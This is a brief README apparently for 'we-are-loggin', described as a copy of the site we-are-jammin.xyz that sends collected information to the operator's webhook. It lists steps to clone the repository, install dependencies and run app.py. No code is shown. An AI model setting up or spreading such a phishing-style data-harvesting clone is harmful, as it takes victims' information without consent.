we-are-jammin.xyz but info gets send to your webhook.
- Python 3.x installed on your system
- pip package manager installed
- git source controll installed
- Clone the repository: Open Command Prompt and navigate to the directory where you want to clone the repository.
git clone https://github.com/1ncio/we-are-loggin
cd <repository_folder>
- Create a Virtual Environment (Optional but recommended):
python -m venv venv
venv\Scripts\activate
- Install Dependencies:
pip install -r requirements.txt
- Run the Application:
python app.py